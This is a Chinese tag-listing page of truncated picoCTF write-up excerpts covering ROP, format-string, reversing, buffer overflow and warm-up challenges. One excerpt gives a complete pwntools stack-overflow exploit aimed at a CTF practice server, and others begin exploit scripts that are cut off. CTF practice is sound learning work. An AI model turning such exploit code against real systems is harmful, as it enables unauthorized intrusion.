首页 > TAG信息列表 > picoctf

picoctf_2018_can_you_gets_me

picoctf_2018_can_you_gets_me 查看保护 直接ropgadget生成的rop chain即可。 from pwn import * from struct import pack context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote

picoctf_2018_echooo(小端序的显示)

例行检查我就不放了,将程序放入ida中    逻辑比较简单,就是将flag放入了栈中,然后通过下面printf去显示flag offset=11+((0x8c-0x4c)/4) 因为栈是小端序储存,高字节在下方,所以需要转换一下 exp如下 from pwn import* #r=process('./PicoCTF_2018_echooo') r=remote('node4.buuoj.cn',2

picoCTF - RE - keygenme-py writeup

这道题没什么意思……把代码里面一部分内容摘出来跑一下就可以了。 它可能主要的意图是让我们学习一下 key 生成的过程?通过把名字 hash 一下,然后选择结果中某些位置的数字,组成了 key 的 dynamic 部分。 用到的主要就是下面这部分题目: if key[i] != hashlib.sha256(username_t

[BUUCTF-pwn]——picoctf_2018_buffer overflow 1

[BUUCTF-pwn]——picoctf_2018_buffer overflow 1 简单的栈溢出, 返回地址,设置为win就好 exploit from pwn import * p = remote("node3.buuoj.cn",25059) payload = 'a' * (0x28 + 4) + p32(0x080485CB) p.sendline(payload) p.interactive()

[CTF]picoCTF-day1

Lets Warm Up If I told you a word started with 0x70 in hexadecimal, what would it start with in ASCII? 这应该就是签到题了吧?爱了爱了,十六进制转十进制再打表(突然ACM)转ASCII,得到‘p’,按照格式输入即可 The Numbers 下载图片后得到一串数字,根据格式盲猜开头是picoCTF,然后又